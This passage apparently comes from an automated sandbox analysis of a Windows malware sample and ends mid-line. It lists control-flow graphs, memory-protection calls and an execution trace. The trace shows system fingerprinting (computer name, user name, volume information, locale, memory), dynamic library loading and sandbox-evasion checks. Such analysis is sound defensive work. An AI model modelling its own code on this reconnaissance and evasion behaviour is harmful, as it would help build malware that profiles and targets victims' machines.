            control_flow_graph 93 28d04d0-28d0e8b 97 28d0e93-28d0ed1 VirtualProtectEx 93->97 98 28d0ed8-28d0eec 97->98 99 28d0ed3 97->99 99->98
            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 603c8cb067e3212b85e698a5d1a283aed4669cb1d3ea436121beee466f89fb55
            • Instruction ID: 08fd07131433540325ef617244ddfa24532a8a94a9c80a0be8bcbf7e4f6bd6cc
            • Opcode Fuzzy Hash: 603c8cb067e3212b85e698a5d1a283aed4669cb1d3ea436121beee466f89fb55
            • Instruction Fuzzy Hash: 822145B5C15259AFCB00DFAAD884ADEFFB4FF49310F10815AE918AB210C374A518CFA5

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 100 28d04e4-28d0ed1 VirtualProtectEx 103 28d0ed8-28d0eec 100->103 104 28d0ed3 100->104 104->103
            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: ef0a84844b402f6d8fa13c80a555d9041561fd734a0afcbecc5a8eb6925b464e
            • Instruction ID: 69f3d486591e3fe62cf73531bebd2e1017175aa3dda0560414cf1579e07c095b
            • Opcode Fuzzy Hash: ef0a84844b402f6d8fa13c80a555d9041561fd734a0afcbecc5a8eb6925b464e
            • Instruction Fuzzy Hash: E421E3B5D1125DEFCB10DF9AD984ADEFBB4FB48310F108119E918A7210C375A954CFA5

            Execution Graph

            Execution Coverage:12.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0.7%
            Total number of Nodes:1508
            Total number of Limit Nodes:3
            execution_graph 12803 401190 12808 417380 12803->12808 12805 40119e 12807 4011b7 12805->12807 12812 4172f0 12805->12812 12809 4173b6 GetComputerNameA 12808->12809 12811 4173d9 12809->12811 12811->12805 12813 417326 GetUserNameA 12812->12813 12815 417363 12813->12815 12815->12807 12816 416490 12834 4022a0 12816->12834 12820 4164a0 12928 401160 GetSystemInfo 12820->12928 12826 4164c1 12827 4164c6 GetUserDefaultLCID 12826->12827 12828 4172f0 GetUserNameA 12827->12828 12829 4164d0 12828->12829 12830 417380 GetComputerNameA 12829->12830 12832 4164e3 12830->12832 12939 4155f0 12832->12939 12833 4165b6 13019 404610 17 API calls 12834->13019 12836 4022b4 12837 404610 34 API calls 12836->12837 12838 4022cd 12837->12838 12839 404610 34 API calls 12838->12839 12840 4022e6 12839->12840 12841 404610 34 API calls 12840->12841 12842 4022ff 12841->12842 12843 404610 34 API calls 12842->12843 12844 402318 12843->12844 12845 404610 34 API calls 12844->12845 12846 402331 12845->12846 12847 404610 34 API calls 12846->12847 12848 40234a 12847->12848 12849 404610 34 API calls 12848->12849 12850 402363 12849->12850 12851 404610 34 API calls 12850->12851 12852 40237c 12851->12852 12853 404610 34 API calls 12852->12853 12854 402395 12853->12854 12855 404610 34 API calls 12854->12855 12856 4023ae 12855->12856 12857 404610 34 API calls 12856->12857 12858 4023c7 12857->12858 12859 404610 34 API calls 12858->12859 12860 4023e0 12859->12860 12861 404610 34 API calls 12860->12861 12862 4023f9 12861->12862 12863 404610 34 API calls 12862->12863 12864 402412 12863->12864 12865 404610 34 API calls 12864->12865 12866 40242b 12865->12866 12867 404610 34 API calls 12866->12867 12868 402444 12867->12868 12869 404610 34 API calls 12868->12869 12870 40245d 12869->12870 12871 404610 34 API calls 12870->12871 12872 402476 12871->12872 12873 404610 34 API calls 12872->12873 12874 40248f 12873->12874 12875 404610 34 API calls 12874->12875 12876 4024a8 12875->12876 12877 404610 34 API calls 12876->12877 12878 4024c1 12877->12878 12879 404610 34 API calls 12878->12879 12880 4024da 12879->12880 12881 404610 34 API calls 12880->12881 12882 4024f3 12881->12882 12883 404610 34 API calls 12882->12883 12884 40250c 12883->12884 12885 404610 34 API calls 12884->12885 12886 402525 12885->12886 12887 404610 34 API calls 12886->12887 12888 40253e 12887->12888 12889 404610 34 API calls 12888->12889 12890 402557 12889->12890 12891 404610 34 API calls 12890->12891 12892 402570 12891->12892 12893 404610 34 API calls 12892->12893 12894 402589 12893->12894 12895 404610 34 API calls 12894->12895 12896 4025a2 12895->12896 12897 404610 34 API calls 12896->12897 12898 4025bb 12897->12898 12899 404610 34 API calls 12898->12899 12900 4025d4 12899->12900 12901 404610 34 API calls 12900->12901 12902 4025ed 12901->12902 12903 404610 34 API calls 12902->12903 12904 402606 12903->12904 12905 404610 34 API calls 12904->12905 12906 40261f 12905->12906 12907 404610 34 API calls 12906->12907 12908 402638 12907->12908 12909 404610 34 API calls 12908->12909 12910 402651 12909->12910 12911 404610 34 API calls 12910->12911 12912 40266a 12911->12912 12913 404610 34 API calls 12912->12913 12914 402683 12913->12914 12915 404610 34 API calls 12914->12915 12916 40269c 12915->12916 12917 404610 34 API calls 12916->12917 12918 4026b5 12917->12918 12919 404610 34 API calls 12918->12919 12920 4026ce 12919->12920 12921 419270 12920->12921 13023 419160 GetPEB 12921->13023 12923 419278 12924 4194a3 LoadLibraryA 12923->12924 12925 4194c1 LoadLibraryA 12924->12925 12927 4194f6 12925->12927 12927->12820 12929 40117c 12928->12929 12930 401110 12929->12930 12931 401131 VirtualAllocExNuma 12930->12931 12932 401141 12931->12932 13024 4010a0 VirtualAlloc 12932->13024 12934 40114e 12935 401220 12934->12935 13026 418450 12935->13026 12938 401249 __aulldiv 12938->12826 12940 4155fd 12939->12940 13028 4026f0 12940->13028 12944 415783 13668 414ff0 12944->13668 12946 4157a3 13673 416fa0 12946->13673 12948 415887 13677 4048d0 12948->13677 12950 41589e 13681 4112b0 12950->13681 12952 4158a6 13689 4059b0 12952->13689 12954 4158e3 13697 410b60 12954->13697 12956 4158ee 12957 4059b0 6 API calls 12956->12957 12958 41592c 12957->12958 13703 4108a0 12958->13703 12960 415937 12961 4059b0 6 API calls 12960->12961 12962 415973 12961->12962 13709 410a50 12962->13709 12964 41597e 13715 411520 12964->13715 12966 41599a 13725 405000 12966->13725 12968 4159bb 13729 410580 12968->13729 12970 415a40 12971 4059b0 6 API calls 12970->12971 12972 415a80 12971->12972 13742 410c80 12972->13742 12974 415a8b 13748 401ec0 12974->13748 12976 415ad0 12977 415ae0 12976->12977 12978 415b72 12976->12978 12980 4059b0 6 API calls 12977->12980 12979 4059b0 6 API calls 12978->12979 12981 415b9f 12979->12981 12982 415b1a 12980->12982 13764 413070 12981->13764 13754 410de0 12982->13754 12985 415b25 13760 4138d0 12985->13760 12986 415b6a 12988 415beb 12986->12988 13771 413bc0 memset 12986->13771 12991 415c10 12988->12991 13791 414260 12988->13791 12994 415c35 12991->12994 13795 414690 12991->13795 12992 415bcc 13785 414be0 12992->13785 12995 415c5a 12994->12995 13809 414850 memset 12994->13809 12999 415c7f 12995->12999 13820 414a20 12995->13820 12997 415cf0 13006 415d93 12997->13006 13007 415d00 12997->13007 13002 415ca4 12999->13002 13826 407750 12999->13826 13004 415cc9 13002->13004 13878 414b30 13002->13878 13004->12997 13882 418ab0 13004->13882 13008 4059b0 6 API calls 13006->13008 13009 4059b0 6 API calls 13007->13009 13010 415dc0 13008->13010 13011 415d3b 13009->13011 13013 413070 6 API calls 13010->13013 13012 410de0 2 API calls 13011->13012 13014 415d46 13012->13014 13015 415d8b 13013->13015 13016 4138d0 9 API calls 13014->13016 13017 4059b0 6 API calls 13015->13017 13016->13015 13018 415dfc 13017->13018 13018->12833 13020 4046e7 13019->13020 13021 4046fc 11 API calls 13020->13021 13022 40479f 6 API calls 13020->13022 13021->13020 13022->12836 13023->12923 13025 4010c2 moneypunct 13024->13025 13025->12934 13027 401233 GlobalMemoryStatusEx 13026->13027 13027->12938 13029 404610 34 API calls 13028->13029 13030 402704 13029->13030 13031 404610 34 API calls 13030->13031 13032 402727 13031->13032 13033 404610 34 API calls 13032->13033 13034 402740 13033->13034 13035 404610 34 API calls 13034->13035 13036 402759 13035->13036 13037 404610 34 API calls 13036->13037 13038 402786 13037->13038 13039 404610 34 API calls 13038->13039 13040 40279f 13039->13040 13041 404610 34 API calls 13040->13041 13042 4027b8 13041->13042 13043 404610 34 API calls 13042->13043 13044 4027e5 13043->13044 13045 404610 34 API calls 13044->13045 13046 4027fe 13045->13046 13047 404610 34 API calls 13046->13047 13048 402817 13047->13048 13049 404610 34 API calls 13048->13049 13050 402830 13049->13050 13051 404610 34 API calls 13050->13051 13052 402849 13051->13052 13053 404610 34 API calls 13052->13053 13054 402862 13053->13054 13055 404610 34 API calls 13054->13055 13056 40287b 13055->13056 13057 404610 34 API calls 13056->13057 13058 402894 13057->13058 13059 404610 34 API calls 13058->13059 13060 4028ad 13059->13060 13061 404610 34 API calls 13060->13061 13062 4028c6 13061->13062 13063 404610 34 API calls 13062->13063 13064 4028df 13063->13064 13065 404610 34 API calls 13064->13065 13066 4028f8 13065->13066 13067 404610 34 API calls 13066->13067 13068 402911 13067->13068 13069 404610 34 API calls 13068->13069 13070 40292a 13069->13070 13071 404610 34 API calls 13070->13071 13072 402943 13071->13072 13073 404610 34 API calls 13072->13073 13074 40295c 13073->13074 13075 404610 34 API calls 13074->13075 13076 402975 13075->13076 13077 404610 34 API calls 13076->13077 13078 40298e 13077->13078 13079 404610 34 API calls 13078->13079 13080 4029a7 13079->13080 13081 404610 34 API calls 13080->13081 13082 4029c0 13081->13082 13083 404610 34 API calls 13082->13083 13084 4029d9 13083->13084 13085 404610 34 API calls 13084->13085 13086 4029f2 13085->13086 13087 404610 34 API calls 13086->13087 13088 402a0b 13087->13088 13089 404610 34 API calls 13088->13089 13090 402a24 13089->13090 13091 404610 34 API calls 13090->13091 13092 402a3d 13091->13092 13093 404610 34 API calls 13092->13093 13094 402a56 13093->13094 13095 404610 34 API calls 13094->13095 13096 402a6f 13095->13096 13097 404610 34 API calls 13096->13097 13098 402a88 13097->13098 13099 404610 34 API calls 13098->13099 13100 402aa1 13099->13100 13101 404610 34 API calls 13100->13101 13102 402aba 13101->13102 13103 404610 34 API calls 13102->13103 13104 402ad3 13103->13104 13105 404610 34 API calls 13104->13105 13106 402aec 13105->13106 13107 404610 34 API calls 13106->13107 13108 402b05 13107->13108 13109 404610 34 API calls 13108->13109 13110 402b1e 13109->13110 13111 404610 34 API calls 13110->13111 13112 402b37 13111->13112 13113 404610 34 API calls 13112->13113 13114 402b50 13113->13114 13115 404610 34 API calls 13114->13115 13116 402b69 13115->13116 13117 404610 34 API calls 13116->13117 13118 402b82 13117->13118 13119 404610 34 API calls 13118->13119 13120 402b9b 13119->13120 13121 404610 34 API calls 13120->13121 13122 402bb4 13121->13122 13123 404610 34 API calls 13122->13123 13124 402bcd 13123->13124 13125 404610 34 API calls 13124->13125 13126 402be6 13125->13126 13127 404610 34 API calls 13126->13127 13128 402bff 13127->13128 13129 404610 34 API calls 13128->13129 13130 402c18 13129->13130 13131 404610 34 API calls 13130->13131 13132 402c31 13131->13132 13133 404610 34 API calls 13132->13133 13134 402c4a 13133->13134 13135 404610 34 API calls 13134->13135 13136 402c63 13135->13136 13137 404610 34 API calls 13136->13137 13138 402c7c 13137->13138 13139 404610 34 API calls 13138->13139 13140 402c95 13139->13140 13141 404610 34 API calls 13140->13141 13142 402cae 13141->13142 13143 404610 34 API calls 13142->13143 13144 402cc7 13143->13144 13145 404610 34 API calls 13144->13145 13146 402ce0 13145->13146 13147 404610 34 API calls 13146->13147 13148 402cf9 13147->13148 13149 404610 34 API calls 13148->13149 13150 402d12 13149->13150 13151 404610 34 API calls 13150->13151 13152 402d2b 13151->13152 13153 404610 34 API calls 13152->13153 13154 402d44 13153->13154 13155 404610 34 API calls 13154->13155 13156 402d5d 13155->13156 13157 404610 34 API calls 13156->13157 13158 402d76 13157->13158 13159 404610 34 API calls 13158->13159 13160 402d8f 13159->13160 13161 404610 34 API calls 13160->13161 13162 402da8 13161->13162 13163 404610 34 API calls 13162->13163 13164 402dc1 13163->13164 13165 404610 34 API calls 13164->13165 13166 402dda 13165->13166 13167 404610 34 API calls 13166->13167 13168 402df3 13167->13168 13169 404610 34 API calls 13168->13169 13170 402e0c 13169->13170 13171 404610 34 API calls 13170->13171 13172 402e25 13171->13172 13173 404610 34 API calls 13172->13173 13174 402e3e 13173->13174 13175 404610 34 API calls 13174->13175 13176 402e57 13175->13176 13177 404610 34 API calls 13176->13177 13178 402e70 13177->13178 13179 404610 34 API calls 13178->13179 13180 402e89 13179->13180 13181 404610 34 API calls 13180->13181 13182 402ea2 13181->13182 13183 404610 34 API calls 13182->13183 13184 402ebb 13183->13184 13185 404610 34 API calls 13184->13185 13186 402ed4 13185->13186 13187 404610 34 API calls 13186->13187 13188 402eed 13187->13188 13189 404610 34 API calls 13188->13189 13190 402f06 13189->13190 13191 404610 34 API calls 13190->13191 13192 402f1f 13191->13192 13193 404610 34 API calls 13192->13193 13194 402f38 13193->13194 13195 404610 34 API calls 13194->13195 13196 402f51 13195->13196 13197 404610 34 API calls 13196->13197 13198 402f6a 13197->13198 13199 404610 34 API calls 13198->13199 13200 402f83 13199->13200 13201 404610 34 API calls 13200->13201 13202 402f9c 13201->13202 13203 404610 34 API calls 13202->13203 13204 402fb5 13203->13204 13205 404610 34 API calls 13204->13205 13206 402fce 13205->13206 13207 404610 34 API calls 13206->13207 13208 402fe7 13207->13208 13209 404610 34 API calls 13208->13209 13210 403000 13209->13210 13211 404610 34 API calls 13210->13211 13212 403019 13211->13212 13213 404610 34 API calls 13212->13213 13214 403032 13213->13214 13215 404610 34 API calls 13214->13215 13216 40304b 13215->13216 13217 404610 34 API calls 13216->13217 13218 403064 13217->13218 13219 404610 34 API calls 13218->13219 13220 40307d 13219->13220 13221 404610 34 API calls 13220->13221 13222 403096 13221->13222 13223 404610 34 API calls 13222->13223 13224 4030af 13223->13224 13225 404610 34 API calls 13224->13225 13226 4030c8 13225->13226 13227 404610 34 API calls 13226->13227 13228 4030e1 13227->13228 13229 404610 34 API calls 13228->13229 13230 4030fa 13229->13230 13231 404610 34 API calls 13230->13231 13232 403113 13231->13232 13233 404610 34 API calls 13232->13233 13234 40312c 13233->13234 13235 404610 34 API calls 13234->13235 13236 403145 13235->13236 13237 404610 34 API calls 13236->13237 13238 40315e 13237->13238 13239 404610 34 API calls 13238->13239 13240 403177 13239->13240 13241 404610 34 API calls 13240->13241 13242 403190 13241->13242 13243 404610 34 API calls 13242->13243 13244 4031a9 13243->13244 13245 404610 34 API calls 13244->13245 13246 4031c2 13245->13246 13247 404610 34 API calls 13246->13247 13248 4031db 13247->13248 13249 404610 34 API calls 13248->13249 13250 4031f4 13249->13250 13251 404610 34 API calls 13250->13251 13252 40320d 13251->13252 13253 404610 34 API calls 13252->13253 13254 403226 13253->13254 13255 404610 34 API calls 13254->13255 13256 40323f 13255->13256 13257 404610 34 API calls 13256->13257 13258 403258 13257->13258 13259 404610 34 API calls 13258->13259 13260 403271 13259->13260 13261 404610 34 API calls 13260->13261 13262 40328a 13261->13262 13263 404610 34 API calls 13262->13263 13264 4032a3 13263->13264 13265 404610 34 API calls 13264->13265 13266 4032bc 13265->13266 13267 404610 34 API calls 13266->13267 13268 4032d5 13267->13268 13269 404610 34 API calls 13268->13269 13270 4032ee 13269->13270 13271 404610 34 API calls 13270->13271 13272 403307 13271->13272 13273 404610 34 API calls 13272->13273 13274 403320 13273->13274 13275 404610 34 API calls 13274->13275 13276 403339 13275->13276 13277 404610 34 API calls 13276->13277 13278 403352 13277->13278 13279 404610 34 API calls 13278->13279 13280 40336b 13279->13280 13281 404610 34 API calls 13280->13281 13282 403384 13281->13282 13283 404610 34 API calls 13282->13283 13284 40339d 13283->13284 13285 404610 34 API calls 13284->13285 13286 4033b6 13285->13286 13287 404610 34 API calls 13286->13287 13288 4033cf 13287->13288 13289 404610 34 API calls 13288->13289 13290 4033e8 13289->13290 13291 404610 34 API calls 13290->13291 13292 403401 13291->13292 13293 404610 34 API calls 13292->13293 13294 40341a 13293->13294 13295 404610 34 API calls 13294->13295 13296 403433 13295->13296 13297 404610 34 API calls 13296->13297 13298 40344c 13297->13298 13299 404610 34 API calls 13298->13299 13300 403465 13299->13300 13301 404610 34 API calls 13300->13301 13302 40347e 13301->13302 13303 404610 34 API calls 13302->13303 13304 403497 13303->13304 13305 404610 34 API calls 13304->13305 13306 4034b0 13305->13306 13307 404610 34 API calls 13306->13307 13308 4034c9 13307->13308 13309 404610 34 API calls 13308->13309 13310 4034e2 13309->13310 13311 404610 34 API calls 13310->13311 13312 4034fb 13311->13312 13313 404610 34 API calls 13312->13313 13314 403514 13313->13314 13315 404610 34 API calls 13314->13315 13316 40352d 13315->13316 13317 404610 34 API calls 13316->13317 13318 403546 13317->13318 13319 404610 34 API calls 13318->13319 13320 40355f 13319->13320 13321 404610 34 API calls 13320->13321 13322 403578 13321->13322 13323 404610 34 API calls 13322->13323 13324 403591 13323->13324 13325 404610 34 API calls 13324->13325 13326 4035aa 13325->13326 13327 404610 34 API calls 13326->13327 13328 4035c3 13327->13328 13329 404610 34 API calls 13328->13329 13330 4035dc 13329->13330 13331 404610 34 API calls 13330->13331 13332 4035f5 13331->13332 13333 404610 34 API calls 13332->13333 13334 40360e 13333->13334 13335 404610 34 API calls 13334->13335 13336 403627 13335->13336 13337 404610 34 API calls 13336->13337 13338 403640 13337->13338 13339 404610 34 API calls 13338->13339 13340 403659 13339->13340 13341 404610 34 API calls 13340->13341 13342 403672 13341->13342 13343 404610 34 API calls 13342->13343 13344 40368b 13343->13344 13345 404610 34 API calls 13344->13345 13346 4036a4 13345->13346 13347 404610 34 API calls 13346->13347 13348 4036bd 13347->13348 13349 404610 34 API calls 13348->13349 13350 4036d6 13349->13350 13351 404610 34 API calls 13350->13351 13352 4036ef 13351->13352 13353 404610 34 API calls 13352->13353 13354 403708 13353->13354 13355 404610 34 API calls 13354->13355 13356 403721 13355->13356 13357 404610 34 API calls 13356->13357 13358 40373a 13357->13358 13359 404610 34 API calls 13358->13359 13360 403753 13359->13360 13361 404610 34 API calls 13360->13361 13362 40376c 13361->13362 13363 404610 34 API calls 13362->13363 13364 403785 13363->13364 13365 404610 34 API calls 13364->13365 13366 40379e 13365->13366 13367 404610 34 API calls 13366->13367 13368 4037b7 13367->13368 13369 404610 34 API calls 13368->13369 13370 4037d0 13369->13370 13371 404610 34 API calls 13370->13371 13372 4037e9 13371->13372 13373 404610 34 API calls 13372->13373 13374 403802 13373->13374 13375 404610 34 API calls 13374->13375 13376 40381b 13375->13376 13377 404610 34 API calls 13376->13377 13378 403834 13377->13378 13379 404610 34 API calls 13378->13379 13380 40384d 13379->13380 13381 404610 34 API calls 13380->13381 13382 403866 13381->13382 13383 404610 34 API calls 13382->13383 13384 40387f 13383->13384 13385 404610 34 API calls 13384->13385 13386 403898 13385->13386 13387 404610 34 API calls 13386->13387 13388 4038b1 13387->13388 13389 404610 34 API calls 13388->13389 13390 4038ca 13389->13390 13391 404610 34 API calls 13390->13391 13392 4038e3 13391->13392 13393 404610 34 API calls 13392->13393 13394 4038fc 13393->13394 13395 404610 34 API calls 13394->13395 13396 403915 13395->13396 13397 404610 34 API calls 13396->13397 13398 40392e 13397->13398 13399 404610 34 API calls 13398->13399 13400 403947 13399->13400 13401 404610 34 API calls 13400->13401 13402 403960 13401->13402 13403 404610 34 API calls 13402->13403 13404 403979 13403->13404 13405 404610 34 API calls 13404->13405 13406 403992 13405->13406 13407 404610 34 API calls 13406->13407 13408 4039ab 13407->13408 13409 404610 34 API calls 13408->13409 13410 4039c4 13409->13410 13411 404610 34 API calls 13410->13411 13412 4039dd 13411->13412 13413 404610 34 API calls 13412->13413 13414 4039f6 13413->13414 13415 404610 34 API calls 13414->13415 13416 403a0f 13415->13416 13417 404610 34 API calls 13416->13417 13418 403a28 13417->13418 13419 404610 34 API calls 13418->13419 13420 403a41 13419->13420 13421 404610 34 API calls 13420->13421 13422 403a5a 13421->13422 13423 404610 34 API calls 13422->13423 13424 403a73 13423->13424 13425 404610 34 API calls 13424->13425 13426 403a8c 13425->13426 13427 404610 34 API calls 13426->13427 13428 403aa5 13427->13428 13429 404610 34 API calls 13428->13429 13430 403abe 13429->13430 13431 404610 34 API calls 13430->13431 13432 403ad7 13431->13432 13433 404610 34 API calls 13432->13433 13434 403af0 13433->13434 13435 404610 34 API calls 13434->13435 13436 403b09 13435->13436 13437 404610 34 API calls 13436->13437 13438 403b22 13437->13438 13439 404610 34 API calls 13438->13439 13440 403b3b 13439->13440 13441 404610 34 API calls 13440->13441 13442 403b54 13441->13442 13443 404610 34 API calls 13442->13443 13444 403b6d 13443->13444 13445 404610 34 API calls 13444->13445 13446 403b86 13445->13446 13447 404610 34 API calls 13446->13447 13448 403b9f 13447->13448 13449 404610 34 API calls 13448->13449 13450 403bb8 13449->13450 13451 404610 34 API calls 13450->13451 13452 403bd1 13451->13452 13453 404610 34 API calls 13452->13453 13454 403bea 13453->13454 13455 404610 34 API calls 13454->13455 13456 403c03 13455->13456 13457 404610 34 API calls 13456->13457 13458 403c1c 13457->13458 13459 404610 34 API calls 13458->13459 13460 403c35 13459->13460 13461 404610 34 API calls 13460->13461 13462 403c4e 13461->13462 13463 404610 34 API calls 13462->13463 13464 403c67 13463->13464 13465 404610 34 API calls 13464->13465 13466 403c80 13465->13466 13467 404610 34 API calls 13466->13467 13468 403c99 13467->13468 13469 404610 34 API calls 13468->13469 13470 403cb2 13469->13470 13471 404610 34 API calls 13470->13471 13472 403ccb 13471->13472 13473 404610 34 API calls 13472->13473 13474 403ce4 13473->13474 13475 404610 34 API calls 13474->13475 13476 403cfd 13475->13476 13477 404610 34 API calls 13476->13477 13478 403d16 13477->13478 13479 404610 34 API calls 13478->13479 13480 403d2f 13479->13480 13481 404610 34 API calls 13480->13481 13482 403d48 13481->13482 13483 404610 34 API calls 13482->13483 13484 403d61 13483->13484 13485 404610 34 API calls 13484->13485 13486 403d7a 13485->13486 13487 404610 34 API calls 13486->13487 13488 403d93 13487->13488 13489 404610 34 API calls 13488->13489 13490 403dac 13489->13490 13491 404610 34 API calls 13490->13491 13492 403dc5 13491->13492 13493 404610 34 API calls 13492->13493 13494 403dde 13493->13494 13495 404610 34 API calls 13494->13495 13496 403df7 13495->13496 13497 404610 34 API calls 13496->13497 13498 403e10 13497->13498 13499 404610 34 API calls 13498->13499 13500 403e29 13499->13500 13501 404610 34 API calls 13500->13501 13502 403e42 13501->13502 13503 404610 34 API calls 13502->13503 13504 403e5b 13503->13504 13505 404610 34 API calls 13504->13505 13506 403e74 13505->13506 13507 404610 34 API calls 13506->13507 13508 403e8d 13507->13508 13509 404610 34 API calls 13508->13509 13510 403ea6 13509->13510 13511 404610 34 API calls 13510->13511 13512 403ebf 13511->13512 13513 404610 34 API calls 13512->13513 13514 403ed8 13513->13514 13515 404610 34 API calls 13514->13515 13516 403ef1 13515->13516 13517 404610 34 API calls 13516->13517 13518 403f0a 13517->13518 13519 404610 34 API calls 13518->13519 13520 403f23 13519->13520 13521 404610 34 API calls 13520->13521 13522 403f3c 13521->13522 13523 404610 34 API calls 13522->13523 13524 403f55 13523->13524 13525 404610 34 API calls 13524->13525 13526 403f6e 13525->13526 13527 404610 34 API calls 13526->13527 13528 403f87 13527->13528 13529 404610 34 API calls 13528->13529 13530 403fa0 13529->13530 13531 404610 34 API calls 13530->13531 13532 403fb9 13531->13532 13533 404610 34 API calls 13532->13533 13534 403fd2 13533->13534 13535 404610 34 API calls 13534->13535 13536 403feb 13535->13536 13537 404610 34 API calls 13536->13537 13538 404004 13537->13538 13539 404610 34 API calls 13538->13539 13540 40401d 13539->13540 13541 404610 34 API calls 13540->13541 13542 404036 13541->13542 13543 404610 34 API calls 13542->13543 13544 40404f 13543->13544 13545 404610 34 API calls 13544->13545 13546 404068 13545->13546 13547 404610 34 API calls 13546->13547 13548 404081 13547->13548 13549 404610 34 API calls 13548->13549 13550 40409a 13549->13550 13551 404610 34 API calls 13550->13551 13552 4040b3 13551->13552 13553 404610 34 API calls 13552->13553 13554 4040cc 13553->13554 13555 404610 34 API calls 13554->13555 13556 4040e5 13555->13556 13557 404610 34 API calls 13556->13557 13558 4040fe 13557->13558 13559 404610 34 API calls 13558->13559 13560 404117 13559->13560 13561 404610 34 API calls 13560->13561 13562 404130 13561->13562 13563 404610 34 API calls 13562->13563 13564 404149 13563->13564 13565 404610 34 API calls 13564->13565 13566 404162 13565->13566 13567 404610 34 API calls 13566->13567 13568 40417b 13567->13568 13569 404610 34 API calls 13568->13569 13570 404194 13569->13570 13571 404610 34 API calls 13570->13571 13572 4041ad 13571->13572 13573 404610 34 API calls 13572->13573 13574 4041c6 13573->13574 13575 404610 34 API calls 13574->13575 13576 4041df 13575->13576 13577 404610 34 API calls 13576->13577 13578 4041f8 13577->13578 13579 404610 34 API calls 13578->13579 13580 404211 13579->13580 13581 404610 34 API calls 13580->13581 13582 40422a 13581->13582 13583 404610 34 API calls 13582->13583 13584 404243 13583->13584 13585 404610 34 API calls 13584->13585 13586 40425c 13585->13586 13587 404610 34 API calls 13586->13587 13588 404275 13587->13588 13589 404610 34 API calls 13588->13589 13590 40428e 13589->13590 13591 404610 34 API calls 13590->13591 13592 4042a7 13591->13592 13593 404610 34 API calls 13592->13593 13594 4042c0 13593->13594 13595 404610 34 API calls 13594->13595 13596 4042d9 13595->13596 13597 404610 34 API calls 13596->13597 13598 4042f2 13597->13598 13599 404610 34 API calls 13598->13599 13600 40430b 13599->13600 13601 404610 34 API calls 13600->13601 13602 404324 13601->13602 13603 404610 34 API calls 13602->13603 13604 40433d 13603->13604 13605 404610 34 API calls 13604->13605 13606 404356 13605->13606 13607 404610 34 API calls 13606->13607 13608 40436f 13607->13608 13609 404610 34 API calls 13608->13609 13610 404388 13609->13610 13611 404610 34 API calls 13610->13611 13612 4043a1 13611->13612 13613 404610 34 API calls 13612->13613 13614 4043ba 13613->13614 13615 404610 34 API calls 13614->13615 13616 4043d3 13615->13616 13617 404610 34 API calls 13616->13617 13618 4043ec 13617->13618 13619 404610 34 API calls 13618->13619 13620 404405 13619->13620 13621 404610 34 API calls 13620->13621 13622 40441e 13621->13622 13623 404610 34 API calls 13622->13623 13624 404437 13623->13624 13625 404610 34 API calls 13624->13625 13626 404450 13625->13626 13627 404610 34 API calls 13626->13627 13628 404469 13627->13628 13629 404610 34 API calls 13628->13629 13630 404482 13629->13630 13631 404610 34 API calls 13630->13631 13632 40449b 13631->13632 13633 404610 34 API calls 13632->13633 13634 4044b4 13633->13634 13635 404610 34 API calls 13634->13635 13636 4044cd 13635->13636 13637 404610 34 API calls 13636->13637 13638 4044e6 13637->13638 13639 404610 34 API calls 13638->13639 13640 4044ff 13639->13640 13641 404610 34 API calls 13640->13641 13642 404518 13641->13642 13643 404610 34 API calls 13642->13643 13644 404531 13643->13644 13645 404610 34 API calls 13644->13645 13646 40454a 13645->13646 13647 404610 34 API calls 13646->13647 13648 404563 13647->13648 13649 404610 34 API calls 13648->13649 13650 40457c 13649->13650 13651 404610 34 API calls 13650->13651 13652 404595 13651->13652 13653 404610 34 API calls 13652->13653 13654 4045ae 13653->13654 13655 404610 34 API calls 13654->13655 13656 4045c7 13655->13656 13657 404610 34 API calls 13656->13657 13658 4045e0 13657->13658 13659 404610 34 API calls 13658->13659 13660 4045f9 13659->13660 13661 4195e0 13660->13661 13662 419a06 LoadLibraryA LoadLibraryA 13661->13662 13665 4195f0 13661->13665 13663 419a36 LoadLibraryA 13662->13663 13664 419a59 LoadLibraryA LoadLibraryA 13663->13664 13667 419a9c 13664->13667 13665->13662 13667->12944 13670 415001 13668->13670 13669 414da0 10 API calls 13669->13670 13670->13669 13671 414cd0 9 API calls 13670->13671 13672 4152bc 13670->13672 13671->13670 13672->12946 13674 416fe8 GetVolumeInformationA 13673->13674 13676 417031 13674->13676 13676->12948 13678 4048e9 13677->13678 13888 404800 13678->13888 13680 4048f5 moneypunct 13680->12950 13682 4112d4 13681->13682 13683 4112e7 13682->13683 13684 4112df ExitProcess 13682->13684 13685 4112f7 strtok_s 13683->13685 13688 411304 13685->13688 13686 4114d2 13686->12952 13687 4114ae strtok_s 13687->13688 13688->13686 13688->13687 13690 4059c9 13689->13690 13691 404800 4 API calls 13690->13691 13693 4059d5 13691->13693 13692 405f6a moneypunct 13692->12954 13693->13692 13694 405f0e memcpy 13693->13694 13695 405f27 13694->13695 13696 405f47 memcpy 13695->13696 13696->13692 13896 41a4a0 13697->13896 13699 410b87 strtok_s 13701 410b94 13699->13701 13700 410c61 13700->12956 13701->13700 13702 410c3d strtok_s 13701->13702 13702->13701 13897 41a4a0 13703->13897 13705 4108c7 strtok_s 13708 4108d4 13705->13708 13706 410a27 13706->12960 13707 410a03 strtok_s 13707->13708 13708->13706 13708->13707 13898 41a4a0 13709->13898 13711 410a77 strtok_s 13712 410a84 13711->13712 13713 410b54 13712->13713 13714 410b30 strtok_s 13712->13714 13713->12964 13714->13712 13716 411536 13715->13716 13717 416fa0 GetVolumeInformationA 13716->13717 13718 4116a6 13717->13718 13719 4172f0 GetUserNameA 13718->13719 13720 411824 13719->13720 13721 417380 GetComputerNameA 13720->13721 13722 41189e 13721->13722 13899 414c70 13722->13899 13724 4121a9 13724->12966 13727 405020 